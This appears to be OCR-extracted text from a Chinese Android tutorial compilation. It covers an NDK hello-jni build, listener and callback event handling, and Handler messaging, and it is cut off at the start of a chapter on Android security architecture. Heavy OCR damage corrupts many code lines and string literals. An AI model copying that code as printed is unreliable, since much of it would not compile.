* file located at: 


* 


a apps/samples/hello-jni/project/src/com/example/HelloJni/HelloJni.java 
i 
jstring 
Java com example hellojni HelloJni stringFromJNI( JNIEnv* env, 
jobject thiz ) 


return (*env)->NewStringUTF(env, "Hello from JNI !"); 


这 里 只 是 实现 了 Java_com example hellojni HelloJni stringFromJNI 方法 ， 而 
Java com example hellojni HelloJni unimplementedStringFromJNI 方法 并 没有 实现 ， 因 为 在 
HelloJni.java 中 只 调用 了 stringFromJNI() 方法 ， 所 以 unimplementedstringFromJNI() 方法 没有 


实现 也 没关系 ， 不 过 建议 最 好 还 是 把 所 有 java 中 定义 的 本 地 方法 都 实现 了 ， 写 个 空 函 数 也 行 ， 
有 总 比 没有 好 。 


Java com example hellojni HelloJni stringFromJNI() E EAE 简 单 的 返回 了 一 个 内 容 为 
"Hello from JNI ! 的 jstring 对 象 〈《 对 应 于 java 中 的 String 对 象 ) 。 


hello-jni.c 文 件 已 经 编写 好 了 ， 现 在 可 以 把 com example hellojni HelloJni.h 文件 给 删 了 ， 当 
然 留 着 也 行 ， 只 是 我 还 是 习惯 把 不 需要 的 文件 给 清理 干净 了 。 
3. 编译 hello-jni.c 生成 相应 的 库 


3.1 编写 Android.mk 文 件 


在 jni 目 录 下 《〈 即 hello-jni.c 同 级 目录 下 ) 新 建 一 个 Android.mk 文 件 ，Android.mk 文件 是 
Android 的 makefile 文 件 ， 内 容 如 下 : 


# Copyright (C) 2009 The Android Open Source Project 

# 

# Licensed under the Apache License, Version 2.0 (the "License"); 

# you may not use this file except in compliance with the License. 

# You may obtain a copy of the License at 

# 

# http: //www.apache.org/licenses/LICENSE-2.0 

# 

# Unless required by applicable law or agreed to in writing, software 
# distributed under the License is distributed on an "AS IS" BASIS, 

# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and 
# limitations under the License. 

# 


OCAL_PATH := $(call my-dir) 
include $(CLEAR_VARS) 


LOCAL_MODULE 
LOCAL_SRC_FILES : 


hello-jni 
hello-jni.c 


include $(BUILD_SHARED_LIBRARY) 


这 个 Androd.mk 文 件 很 短 ， 下 面 我 们 来 逐 行 解释 下 : 

LOCAL_PATH := $(call my-dir) 

一 个 Android.mk 文件 首先 必须 定义 好 LOCAL_PATH 变 量 。 它 用 于 在 开发 树 中 查找 源 文件 。 在 
AGF P > RBA my-dir’, 由 编译 系统 提供 ， 用 于 返回 当前 路 径 ( 即 包含 Android.mk file X 
件 的 目录 ) 。 

include $( CLEAR_VARS) 
CLEAR_VARS 由 编译 系统 提供 ， 指 定 让 GNU MAKEFILE 为 你 清除 许多 LOCAL_XXX 变 量 (4 
+e LOCAL. MODULE, LOCAL_SRC_FILES, LOCAL_STATIC_LIBRARIES, 等 等 ...), 除了 
LOCAL PATH 。 这 是 必要 的 ， 因 为 所 有 的 编译 控制 文件 都 在 同一 个 GNU MAKE 执 行 环境 

中 ， 所 有 的 变量 都 是 全 局 的 。 


LOCAL_MODULE := hello-jni 


编译 的 目标 对 象 ，LOCAL_MODULE 变 量 必须 定义 ， 以 标识 你 在 Android.mk 文 件 中 描述 的 每 
个 模块 。 名 称 必须 是 唯一 的 ， 而 且 不 包含 任何 空格 。 


注意 : 编译 系统 会 自动 产生 合适 的 前 级 和 后 级 ， 换 和 句 话说 ， 一 个 被 命名 为 'hello-jni" 的 共享 库 模 
块 ， 将 会 生成 bhello-jni.so' 文 件 。 


重要 注意 事项 : 


如 果 你 把 库 命名 为 ibhello-jni?， 编 译 系 统 将 不 会 添加 任何 的 lib 前 级 ， 也 会 生成 "libhello- 
jni.so'， 这 是 为 了 支持 来 源 于 Android 平 台 的 源 代码 的 Android.mk 文 件 ， 如 果 你 确实 需要 这 人 么 
做 的 话 。 


LOCAL_SRC_FILES := hello-jni.c 


LOCAL_SRC_FILES 变 量 必须 包含 将 要 编译 打包 进 模块 中 的 C 或 C++ 源 代码 文件 。 注 意 ， 你 不 
用 在 这 里 列 出 头 文件 和 包含 文件 ， 因 为 编译 系统 将 会 自动 为 你 找 出 依赖 型 的 文件 ; 仅仅 列 出 
直接 传递 给 编译 器 的 源 代码 文件 就 好 。 


注意 ， 默 认 的 C++ 源码 文件 的 扩展 名 是 '.cpp'. 指定 一 个 不 同 的 扩展 名 也 是 可 能 的 ， 只 要 定义 
LOCAL_DEFAULT_CPP_EXTENSION 变 量 ， 不 要 忘记 开始 的 小 圆 点 (也 就 是 :.CXX', 而 不 
是 'CXX' ) 

include $(BUILD_SHARED_LIBRARY) 


BUILD_SHARED_LIBRARY 表 示 编 译 生成 共享 库 ， 是 编译 系统 提供 的 变量 ， 指 向 一 个 GNU 
Makefile 脚 本 ， 负 责 收 集 自从 上 次 调用 'include $(CLEAR_VARS) 以 来 ， 定 义 在 LOCAL XXX 
变量 中 的 所 有 信息 ， 并 且 决 定编 译 什么 ， 如 何 正 确 地 去 做 。 还 有 BUILD_STATIC_LIBRARY 
变量 表示 生成 静态 库 : lib$(LOCAL MODULE).a : BUILD EXECUTABLE 表示 生成 可 执行 文 
件 ， 可 以 直接 把 可 执行 文件 adb push 到 某 目 录 并 chmod 给 予 执行 权限 ， 然 后 adb shell 直接 
执行 它 。 


3.2 生成 .so 共享 库 文 件 


Andro 文 件 已 经 编写 好 了 ， 现 在 可 以 用 android NDK 开 发 包 中 的 ndk-build 脚 本 生成 对 应 的 .so 
共享 库 了 ， 方 法 如 下 : 


braincolQubuntu:-/workspace/android/NDK/hello-jni/jni$ cd .. 
braincolQubuntu:-/workspace/android/NDK/hello-jni$ ls 

AndroidManifest.xml assets bin default.properties gen jni libs obj res src 
braincol@ubuntu:~/workspace/android/NDK/hello-jni$ ndk-build 


Gdbserver : [arm-linux-androideabi-4.4.3] libs/armeabi/gdbserver 
Gdbsetup : libs/armeabi/gdb.setup 
Install : libhello-jni.so -» libs/armeabi/libhello-jni.so 


可 以 看 到 已 经 正确 的 生成 了 libhello-jni.so 共 享 库 了 ， 我 们 去 libs/armeabi/ 目录 下 看 看 : 


braincolQubuntu:-/workspace/android/NDK/hello-jni$ cd libs/ 
braincolQubuntu:-/workspace/android/NDK/hello-jni/libs$ ls 

armeabi 

braincolQubuntu:-/workspace/android/NDK/hello-jni/libs$ cd armeabi/ 
braincolQubuntu:-/workspace/android/NDK/hello-jni/libs/armeabi$ ls 
gdbserver  gdb.setup libhello-jni.so 


4. 在 eclipse 重 新 编译 HelloJni 工 程 ， 生 成 apk 


eclipse 中 刷新 下 HelloJni 工 程 ， 重 新 编译 生成 apk，libhello-jni.so 共 享 库 会 一 起 打包 在 apk 文 件 
内 o 


在 模拟 器 中 看 看 运行 结果 : 


hello-jni 


an P 3:27 om 
Hellojnl M E ; 


Hello from JNI! 





附 : 使 用 android # 4 android 工程 


在 使 用 ndk-build 工具 前 ， 需 要 先 有 一 个 Android 工程 ， 这 个 工程 可 以 从 Android NDK 的 
samples 目录 下 随便 复制 一 份 ， 也 可 以 使 用 Android SDK 开发 包 tools 目录 下 的 android 脚本 
生成 。 

android 脚本 可 以 用 来 管理 AVD、android 工程 ， 完 整 命令 可 以 “android --help" 查看 。 


android create project -n hellojni -p hellojni -t android-19 -k com.example.hellojni -a He. 
命令 行 解释 如 下 : 
"n" 指定 android 工程 的 名 称 ; "-t" 指定 生成 android 工程 的 平台 版 本 ， 也 就 是 android list 


列 出 的 版 本 之 一 ; "-p" 指定 生成 工程 的 目录 名 ; "-k" 指定 android 工程 的 包 名 ; "-a" 指定 默认 
activity 的 名 称 ; android create project 会 根据 默认 activity 文件 名 自动 生成 相应 的 java 文 
件 ， 并 生成 AndroidManifest.xml ° 


Reference 


http://www.cnblogs.com/hibraincol/archive/2011/05/30/2063847 .html 


Android 基于 监听 的 事件 处 理 机 制 


我 们 可 以 利用 Android 的 UI 控件 构成 一 个 精美 的 界面 ， 但 界面 后 面 的 逻辑 与 业务 实现 是 基于 
Android 的 事件 处 理 机 制 。 何 为 事件 处 理 机 制 ? 举 个 简单 的 例子 ， 比 如 点 击 一 个 按钮 ， 我 们 向 
服务 器 发 送 登 陆 请 求 ; 比如 屏幕 发 生 选择 ， 我 们 点 击 了 屏幕 上 某 个 区 域 。 简 单 点 说 ， 事 件 处 
理 机 制 就 是 我 们 和 UI 发 生 交 互 时 ， 我 们 在 背后 添加 一 些小 动作 而 已 。 


基于 监听 的 事件 处 理 机 制 








流程 模型 图 : 
E anes 
E 
@ 触 发 事件 后 ,将 产生 的 事件 对 象 
作为 参数 传 入 事件 处 理 器 
给 出 对 应 的 操作 
对 事件 进行 分 类 的 ,不 同 的 事 
pb. arde. 
文字 表述 : 


事件 监听 机 制 中 由 事件 源 ， 事 件 ， 事 件 监听 器 三 类 对 象 组 成 处 理 流程 如 下 : 

Step 1: 为 某 个 事件 源 (组 件 ) 设 置 一 个 监听 器 ,用 于 监听 用 户 操 作 

Se es PS 

Step 3: 生 成 了 对 应 的 事件 对 象 

Step 4: 将 这 个 事件 源 对 象 作为 参数 传 给 事件 监听 器 

Step 5: 事 件 监 听 器 对 事件 对 象 进行 判断 ,执行 对 应 的 事件 处 理 器 (对 应 事件 的 处 理 方法 ) 


上 归纳: 


事件 监听 机 制 是 一 种 委派 式 的 事件 处 理 机 制 ， 事 件 源 (组 件 ) 事 件 处 理 委托 给 事件 监听 器 ， 
当 事 件 源 发 生 指定 事件 时 ,就 通知 指定 事件 监听 器 ,执行 相应 的 操作 
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我 们 以 下 面 这 个 : 简单 的 按钮 点 击 ,提示 Toast 信 息 的 程序 ; 使 用 五 种 不 同 的 形式 来 实现 。 
效果 图 : 


Bs 
| 


S! 内 部 类 作为 事件 监听 


你 点 击 了 按钮 





1) 直接 用 匿名 内 部 类 


平时 最 常用 的 一 种 :直接 setXxxListener 后 , 重 写 里 面 的 方法 即 可 ; 通常 是 临时 使 用 一 次 , 复 用 性 


不 高 。 


实现 代码 如 下 : MainAcivity.java: 


package com.jay.example.innerlisten; 


import android.os.Bundle; 

import android. view. View; 

import android. view.View.OnClickListener; 
import android.widget.Button; 

import android.widget.Toast; 

import android.app.Activity; 


public class MainActivity extends Activity { 
private Button btnshow; 


@Override 
protected void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState) ; 
setContentView(R.layout.activity main); 
btnshow - (Button) findViewById(R.id.btnshow); 
btnshow.setOnClickListener(new OnClickListener() { 
// 重 写 点 击 事件 的 处 理 方法 onCLick() 
@Override 
public void onClick(View v) { 
// X: Toastíà & 
Toast.makeText(getApplicationContext(), "4&4", Toast.LENGTH SHO 





RT).show(); 


3): 


j 


2) 使 用 内 部 类 


和 上 面 的 匿名 内 部 类 不 同 。 
使 用 优点 :可 以 在 该 类 中 进行 复 用 ,可 直接 访问 外 部 类 的 所 有 界面 组 件 。 
实现 代码 如 下 : MainAcivity.java: 


package com.jay.example.innerlisten; 


import android.os.Bundle; 

import android. view. View; 

import android.view.View.OnClickListener; 
import android.widget.Button; 

import android.widget.Toast; 

import android.app.Activity; 


public class MainActivity extends Activity { 

private Button btnshow; 

QOverride 

protected void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 
btnshow - (Button) findViewById(R.id.btnshow); 
// 直 接 new 一 个 内 部 类 对 象 作为 参数 
btnshow.setOnClickListener(new BtnClickListener()); 


} 
// 定 义 一 个 内 部 类 , 实现 View.0nClickListener 接 口 ， 并重 写 onClick( ) 方 法 
class BtnClickListener implements View.OnClickListener 
{ 

@Override 

public void onClick(View v) { 

Toast .makeText(getApplicationContext(), "按钮 被 点 击 了 "，Toast .LENGTH_SHORT). 
show(); 

} 

} 


3) 使 用 外 部 类 


就 是 另外 创建 一 个 处 理事 件 的 Java 文 件 ,这 种 形式 用 的 比较 少 ， 因 为 外 部 类 不 能 直接 访问 用 户 
界面 类 中 的 组 件 ,要 通过 构造 方法 将 组 件 传 入 使 用 ， 这 样 导致 的 结果 就 是 代码 不 够 简洁 。 
ps: 为 了 演示 传 参 ,这 里 用 TextView 代 替 Toast 提 示 。 


e! 内 部 类 作为 事件 监听 





实现 代码 如 下 : MyClick.java: 


package com.jay.example.innerlisten; 


import android.view.View; 
import android.view.View.OnClickListener; 
import android.widget.TextView; 


public class MyClick implements OnClickListener { 
private TextView textshow; 
// 把 文本 框 作为 参数 传 入 
public MyClick(TextView txt) 


{ 

textshow = txt; 
b 
QOverride 


public void onClick(View v) { 
// 点 击 后 设置 文本 框 显示 的 文字 
textshow.setText(" Xx J 4x41"); 


MainActivity.java 


package com.jay.example.innerlisten; 
import android.os.Bundle; 

import android.widget.Button; 

import android.widget.TextView; 
import android.app.Activity; 


public class MainActivity extends Activity { 

private Button btnshow; 

private TextView txtshow; 

@Override 

protected void onCreate(Bundle savedInstanceState) { 
super .onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 
btnshow = (Button) findViewById(R.id.btnshow) ; 
txtshow = (TextView) findViewById(R.id.textshow) ; 
// 直 接 new 一 个 外 部 类 ， 并 把 TextView 作 为 参数 传 入 
btnshow.setOnClickListener(new MyClick(txtshow) ); 


4) 直接 使 用 Activity 作 为 事件 监听 器 


只 需要 让 Activity 类 实现 XxxListener 事 件 监听 接口 ,在 Activity 中 定义 重 写 对 应 的 事件 处 理 器 方法 
eg:Actitity 实 现 了 OnClickListener 接 口 , 重 写 了 onClick(view) 方 法 ， 在 为 茶 些 组 件 添加 该 事件 监 
听 对 象 时 ,直接 setXxx.Listener(this) 即 可 

实现 代码 如 下 : MainAcivity.java: 


package com.jay.example.innerlisten; 
import android.os.Bundle; 

import android. view.View; 

import android.view.View.OnClickListener; 
import android.widget.Button; 

import android.widget.Toast; 

import android.app.Activity; 


//ikActivityZ ik €3LOnClickListeneri£ uv 
public class MainActivity extends Activity implements OnClickListener{ 
private Button btnshow; 
@Override 
protected void onCreate(Bundle savedInstanceState) { 
super .onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 


btnshow = (Button) findViewById(R.id.btnshow) ; 
// 直 接 写 个 this 
btnshow.setOnClickListener(this); 


// 重 写 接口 中 的 抽象 方法 
@Override 


public void onClick(View v) { 
Toast .makeText(getApplicationContext(), "Adi J #42", Toast.LENGTH SHORT).show() 


就 是 直接 在 xml 布 局 文件 中 对 应 的 Activity 中 定义 一 个 事件 处 理 方法 

eg:public void myClick(View source) 

SOUrce 对 应 事件 源 (组 件 )， 接 着 布局 文件 中 对 应 要 触发 事件 的 组 件 ,设置 一 个 属性 :onclick = " 
myclick" 即 可 

实现 代码 如 下 : MainAcivity.java: 


package com.jay.example.caller; 


import android.app.Activity; 
import android.os.Bundle; 
import android.view. View; 
import android.widget.Toast; 


public class MainActivity extends Activity { 

@Override 

protected void onCreate(Bundle savedInstanceState) { 
super .onCreate(savedInstanceState) ; 
setContentView(R.layout.activity main); 

} 

// 自 定义 一 个 方法 , 传 入 一 个 view 组 件 作 为 参数 

public void myclick(View source) 


{ 
Toast .makeText(getApplicationContext(), "按钮 被 点 击 了 ",，Toast.LENGTH_SHORT).show 


O; 
} 


} 


main.xml 布 局 文件 : 


<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" 
xmlns: tools="http://schemas.android.com/tools" 
android: id="@+tid/LinearLayouti" 
android: layout_width="match_parent" 
android:layout height-"match parent" 
android:orientation-"vertical" > 
«Button 
android: layout_width="wrap_content" 
android: layout_height="wrap_content" 
android: text="4#42" 
android:onClick="myclick"/> 
</LinearLayout> 


Android Handler 消 息 传递 机 制 


Android 为 了 线程 安全 ， 并 不 允许 我 们 在 UI 线 程 (主线 程 ) 外 操作 UI ; 很 多 时 候 我 们 做 界面 刷 
新 都 需要 通过 Handler 来 通知 UI 组 件 更 新 。 除 了 用 Handler 完 成 界面 更 新 外 ， 还 可 以 使 用 

runOnUiThread() 来 更 新 ， 甚 至 使 用 AsyncTask、 更 高 级 的 事务 总 线 。 当 然 ， 这 里 我 们 只 讲解 
Handler， 什 么 是 Handler， 执 行 流程 ， 相 关 方 法 ， 子 线程 与 主线 程 中 使 用 Handler 的 区 别 等 。 


1.Handler 类 的 引入 : 










线程 安全 问题 的 引入 android 提 供 的 解决 机 制 i 
AN 并 =fFUL 4 

cm- gii | 规定 :只 允许 在 UI 线程 中 修改 | 
| 的 出 现 Activity 中 的 UI 组 件 ] 


2.Handler 的 执行 流程 图 


o 







o 







Message 





流程 图 解析 : 相关 名 词 
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UI 线程 :就 是 我 们 的 主线 程 ,系统 在 创建 UI 线程 的 时 候 会 初始 化 一 个 Looper 对 象 ,同时 也 会 
创建 一 个 与 其 关联 lane 

Handler :作用 就 是 发 送 与 处 理 信息 ,如 果 希 望 Handler 正 常 工作 ,在 当前 线程 中 要 有 一 个 
Looper 对 象 

Message :Handler 接 收 与 处 理 的 消息 对 象 

MessageQueue :消息 队列 ,先进 先 出 管理 Message, 在 初始 化 Looper 对 象 时 会 创建 一 个 与 
之 关联 的 MessageQueue; 

Looper :每 个 线程 只 能 够 有 一 个 Looper, 管 理 MessageQueue, 不 断 地 从 中 取出 Message 分 
发 给 对 应 的 Handler 处 理 。 





简单 点 说 : 


当 我 们 的 子 线程 想 修 改 Activity 中 的 UI 组 件 时 ,我 们 可 以 新 建 一 个 Handler 对 象 ,通过 这 个 对 
象 向 主线 程 发 送信 息 ;而 我 们 发 送 的 信息 会 先 到 主线 程 的 MessageQueue 进 行 等 待 ,由 
Looper 按 先入 先 出 顺序 取出 ,再 根据 message 对 象 的 what 属 性 分 发 给 对 应 的 Handler 进 行 
Ab3E o 


3.Handler 的 相关 方法 : 


void handleMessage (Message msg): 处 理 消息 的 方法 ,通常 是 用 于 被 重 写 

sendEmptyMessage (int what ) :发 送 空 消息 

sendEmptyMessageDelayed (int what,long delayMillis) :指定 延 时 多 少 毫秒 后 发 送 空 信息 
sendMessage (Message msg) :立即 发 送信 息 

sendMessageDelayed (Message msg) :指定 延 时 多 少 毫秒 后 发 送信 息 

final boolean hasMessage (int what ) :检查 消息 队列 中 是 否 包含 WMhat 属 性 为 指定 值 的 消息 

如 果 是 参数 为 (int what,Object object) :除了 判断 what 属 性 ,还 需要 判断 0bject 属 性 是 否 为 指定 对 象 的 消息 


4.Handler 的 使 用 示例 


1) Handler 写 在 主线 程 中 


在 主线 程 中 ,因为 系统 已 经 初始 化 了 一 个 Looper 对 象 , 所 以 我 们 直接 创建 Handler 对 象 ,就 可 以 进 
行 信息 的 发 送 与 处 理 了 。 
代码 示例 : 简单 的 一 个 定时 切换 图 片 的 程序 ,通过 Timer 定 时 器 ,定时 修改 ImageView 显 示 的 内 


,从 而 形成 帧 动画 


i oq 


3M HandlerDemol 








实现 代码 : 


<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" 
xmlns: tools="http://schemas.android.com/tools" 
android: id="@+id/RelativeLayout1i" 
android: layout_width="match_parent" 
android: layout_height="match_parent" 
android: gravity="center" 
tools:context="com.jay.example.handlerdemo1.MainActivity" > 


<ImageView 
android: id="@+id/imgchange" 
android: layout_width="wrap_content" 
android: layout_height="wrap_content" 
android: layout_alignParentLeft="true" 
android: layout_alignParentTop="true" /> 


</RelativeLayout> 


MainActivity.java : 


public class MainActivity extends Activity { 


// 定 义 切换 的 图 片 的 数组 id 

int imgids[] = new int[]{ 
R.drawable.s 1, R.drawable.s 2,R.drawable.s 3, 
R.drawable.s 4,R.drawable.s 5,R.drawable.s 6, 
R.drawable.s 7,R.drawable.s 8 

J; 


int imgstart = 0; 
final Handler myHandler = new Handler () 


@Override 
// 重 写 handleMessage 方 法 ,根据 msg 中 what 的 值 判断 是 否 执行 后 续 操作 
public void handleMessage(Message msg) { 

if(msg.what == 0x123) 


{ 
imgchange.setImageResource(imgids[imgstart++ % 8]); 
} 
} 
J; 
@Override 


protected void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 


final ImageView imgchange - (ImageView) findViewById(R.id.imgchange); 





// 使 用 定时 器 ,每 隔 209 毫 秒 让 handler 发 送 一 个 空 信息 
new Timer().schedule(new TimerTask() { 
@Override 
public void run() { 
myHandler.sendEmptyMessage(0x123); 


} 
}, 0,200); 


2) Handler 写 在 子 线程 中 


如 果 是 Handler 写 在 子 线程 中 的 话 ,我 们 就 需要 自己 创 建 一 个 Looper 对 象 T 


创建 的 流程 如 下 : 


1] 直接 调用 Looper.prepare() 方 法 即 可 为 当前 线程 创建 Looper 对 象 ,而 它 的 构造 


的 MessageQueue; 


创建 配套 


2] 创建 Handler 对 象 , 重 写 handleMessage( ) 方 法 就 可 以 处 理 来 自 于 其 他 线程 的 信息 了 ; 


3] 调用 Looper.loop() 方 法 启动 Looper 


使 用 示例 : 输入 一 个 数 ， 计算 后 通过 Toast 输 出 在 这 个 范围 内 的 所 有 质数 


实现 代码 : main.xml : 


<LinearLayout 
xmlns:android="http://schemas.android.com/apk/res/android" 
android: layout_width="match_parent" 
android:layout height-"match parent" 
android:orientation-"vertical"-» 
«EditText 
android:id-"Q-*-id/etNum" 
android: inputType="number" 
android: layout_width="match_parent" 
android: layout_height="wrap_content" 
android:hint=" 请 输入 上 限 "/> 
<Button 
android: layout_width="match_parent" 
android: layout_height="wrap_content" 
android:onClick="cal" 
android: text="#ii"/> 
</LinearLayout> 


MainActivity.java: 


public class CalPrime extends Activity 
{ 
static final String UPPER_NUM = "upper"; 
EditText etNum; 
CalThread calThread; 
// 定义 一 个 线程 类 
class CalThread extends Thread 


{ 
public Handler mHandler; 
public void run() 
x 
Looper.prepare(); 
mHandler - new Handler() 
{ 
// 定义 处 理 消息 的 方法 
@Override 
public void handleMessage(Message msg) 
1 
if(msg.what -- 0x123) 
{ 
int upper = msg.getData().getInt(UPPER_NUM) ; 
List<Integer> nums = new ArrayList<Integer>(); 
// 计算 从 2 开始 、 到 upper 的 所 有 质数 
outer : 
for (int i = 2 ; i <= upper ; i++) 
// PARP M2ASS ` Bit FA ART AS 
for (int j = 2 ; j <= Math.sqrt(i) ; j++) 
// 如 果 可 以 整除 ， 表 明 这 个 数 不 是 质数 
if(i != 2 && i % j == 0) 
{ 
continue outer; 
} 
nums.add(i); 
} 
// 使 用 Toast 显 示 统 计 出 来 的 所 有 质数 
Toast.makeText(CalPrime.this , nums.toString() 
, Toast.LENGTH LONG).show(); 
} 
} 
J; 
Looper .loop(); 
} 
} 


@Override 


public void onCreate(Bundle savedInstanceState) 
{ 
super .onCreate(savedInstanceState) ; 
setContentView(R.layout.main); 
etNum = (EditText)findViewById(R.id.etNum); 
calThread - new CalThread(); 
// 启动 新 线程 
calThread.start(); 
n 
// 为 按钮 的 点 击 事件 提供 事件 处 理 函 数 
public void cal(View source) 


{ 





// 创建 消息 
Message msg = new Message(); 
msg.what = 0x123; 
Bundle bundle = new Bundle(); 
bundle.putInt(UPPER_NUM , 

Integer .parseInt(etNum.getText().toString())); 
msg.setData(bundle); 
// 34v Handler X 3i 
calThread.mHandler.sendMessage(msg); 


n 


Android 回 调 的 事件 处 理 机 制 详解 


在 Android 中 基于 回调 的 事件 处 理 机 制 使 用 场景 有 两 个 : 


1) 自 定义 view 


当 用 户 在 GUI 组 件 上 激发 某 个 事件 时 ,组 件 有 自己 特定 的 方法 会 负责 处 理 该 事件 。 
通常 用 法 :继承 基本 的 GUI 组 件 , 重 写 该 组 件 的 事件 处 理 方法 , 即 自 定 义 view。 

注意 :在 Xml 布局 中 使 用 自 定义 的 view 时 ,需要 使 用 "全 限定 类 名 " 

常见 View 组 件 的 回调 方法 : 

android 为 GUI 组 件 提供 了 一 些 事件 处 理 的 回调 方法 ,以 View 为 例 ,有 以 下 几 个 方法 


GD 在 该 组 件 上 触发 屏幕 事件 : boolean onTouchEvent (MotionEvent event); 

人 @) 在 该 组 件 上 按 下 某 个 按钮 时 : boolean onKeyDown (int keyCode,KeyEvent event); 

(人 @ 松 开 组 件 上 的 某 个 按钮 时 : boolean onKeyUp (int keyCode,KeyEvent event); 

人 长 按 组 件 某 个 按钮 时 : boolean onKeyLongPress (int keyCode,KeyEvent event); 

@@) 键 盘 快 捷 键 事件 发 生 : boolean onKeyShortcut (int keyCode,KeyEvent event); 

(@ 在 组 件 上 触发 轨迹 球 屏 事 件 : boolean onTrackballEvent (MotionEvent event); 

(2) 当 组 件 的 焦点 发 生 改 变 , 和 前 面 的 6 个 不 同 , 这 个 方法 只 能 够 在 View 中 重 写 。protected void onFocusChanged 
(boolean gainFocus, int direction, Rect previously FocusedRect) 


代码 示例 : 我 们 自 定义 一 个 MyButton 类 继承 Button 类 ,然后 重 写 onKeyLongPress 方 法 ;接着 在 
xml 文 件 中 通过 全 限定 类 名 调用 自 定义 的 view 
效果 图 如 下 : 








一 个 简单 的 按钮 ,点 击 按钮 后 触发 onTouchEvent 事 件 , 当 我 们 按 模拟 器 上 的 键盘 时 , 按 下 触发 
onKeyDown, 离 开 键 盘 时 触发 onKeyUp 事 件 ,我 们 通过 Logcat 进 行 查看 。 


呵呵 : 
呵呵 : 


呵呵 : 
呵呵 : 


H H H H 





实现 代码 : MyButton.java 


public class MyButton extends Button{ 
private static String TAG = "77"; 
public MyButton(Context context, AttributeSet attrs) 


{ 


super(context, attrs); 


} 
// 重 写 键盘 按 下 触发 的 事件 
@Override public boolean onKeyDown(int keyCode, KeyEvent event) 


{ 


super .onKeyDown(keyCode, event); 
Log.i(TAG, "onKeyDown 方 法 被 调用 " ) ; 
return Ue 


} 
// 重 写 弹 起 键盘 触发 的 事件 
@Override public boolean onKeyUp(int keyCode, KeyEvent event) 


{ 
super .onKeyUp(keyCode, event); 
Log.i(TAG,"onKeyUp 方 法 被 调用 " ) ; 
re tun Ue 


// 组 件 被 触摸 了 
@Override public boolean onTouchEvent(MotionEvent event) 


{ 
super .onTouchEvent (event); 
Log.I(TAG,"onTouchEvent 方 法 被 调用 " ) ; 
return IUe 
} 
} 
布局 文件 : 


<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" 
xmlns:tools-"http://schemas.android.com/tools" 
android: layout_width="match_parent" 
android: layout_height="match_parent" 
tools:context=".MyActivity"> 
«example.jay.com.mybutton.MyButton 
android:layout width-"wrap content" 
android:layout height-"wrap content" 
android:textz'iz42"/» 
</RelativeLayout> 


代码 解析 : 

为 我 们 直接 重 写 了 Button 的 三 个 回调 方法 , 当 发 生 点 击 事件 后 就 不 需要 我 们 在 Java 文 件 中 进 
行事 件 监听 器 的 绑 定 就 可 以 完成 回调 , 即 组 件 会 处 理 对 应 的 事件 , 即 事件 由 事件 源 ( 组 件 ) 自 身 处 
理 。 


2) 基于 回调 的 事件 传播 : 


Android 基于 回调 的 事件 处 理 机 制 





综 上 ,就 是 如 果 是 否 向 外 传播 取决 于 方法 的 返回 值 是 时 true 还 是 false 。 


代码 示例 : 
public class MyButton extends Button 
{ 
private static String TAG =  ""Twj"; 
public MyButton(Context context, AttributeSet attrs) 
{ 
super(context, attrs); 
} 
// 重 写 键盘 按 下 触发 的 事件 
@Override public boolean onKeyDown(int keyCode, KeyEvent 
{ 
super .onKeyDown(keyCode, event); 
Log.i(TAG, " 自 定义 按钮 的 onKeyDown 方 法 被 调用 " ) ; 
return false; 
} 
} 
main.xml: 


event) 


«LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" 


xmlns:tools-"http://schemas.android.com/tools" 
android:layout width-"match parent" 
android:layout height-"match parent" 
tools:context=".MyActivity"> 
«example.jay.com.mybutton.MyButton 
android:layout width-"wrap content" 
android:layout height-"wrap content" 
android:text=" 自 定义 按钮 " 
android:id="@+id/btn_my"/> 
</LinearLayout> 


MainActivity.java : 
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public class MyActivity extends ActionBarActivity 


{ 
@Override protected void onCreate(Bundle savedInstanceState) 
{ 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity my); 
Button btn = (Button)findViewById(R.id.btn my); 
btn.setOnKeyListener(new View.OnKeyListener() 41 
@Override public boolean onKey(View v, int keyCode, KeyEvent event) 
if(event.getAction() == KeyEvent.ACTION_DOWN) 
Log.i( "TT", "监听 器 的 onKeyDown 方 法 被 调用 " ) ; 
return false; 
j 
3 
} 
@Override public boolean onKeyDown(int keyCode, KeyEvent event) 
{ 
super.onKeyDown(keyCode, event); 
Log.i(" 呵 呵 ", "Activity 的 onKeyDown 方 法 被 调用 " ) ; 
return false; 
} 
} 
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结果 分 析 : 从 上 面 的 运行 结果 ,我 们 就 可 以 知道 ,传播 的 顺序 是 : 监听 器 ---> View 组 件 的 回调 方 
法 ---> Activity 的 回调 方法 了 。 


Android 安 全 概述 


第 一 章 Android 


来 源 : Yury Zhauniarovich | Publications 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


Android 安全 架构 的 理解 不 仅 帮 助 我 了 解 Android 的 工作 原理 ， 而 且 为 我 开店 了 如 何 构建 移动 
操作 系统 和 Linux 的 眼界 。 本章 从 安全 角度 讲解 Android 架构 的 基础 知识 。 在 第 1.1 节 中 ， 
我 们 会 描述 Android 的 主要 层级 ， 而 第 1.2 节 给 出 了 在 此 操作 系统 中 实现 的 安全 机 制 的 高 级 
概述 。 


1.1 Android 技术 栈 


Android 是 一 个 用 于 各 种 移动 设备 的 软件 栈 ， 以 及 由 Google 领导 的 相应 开源 项 目 [9] 。 
Android 由 四 个 层 组 成 : Linux 内 核 ， 本 地 用 户 空间 ， 应 用 程序 框架 和 应 用 程序 层 。 有 时 本 地 
用 户 空间 和 应 用 程序 框架 层 被 合并 到 一 个 层 中 ， 称 为 Android 中 间 件 层 。 图 1.1 表示 
Android 软件 栈 的 层级 。 粗略 地 说 ， 在 这 个 图 中 ， 绿 色 块 对 应 在 C/C++ 中 开发 的 组 件 ， 而 蓝 
色 对 应 在 Java 中 实现 的 组 件 。 Google 在 Apache 2.0 许可 证 下 分 发 了 大 部 分 Android 代 

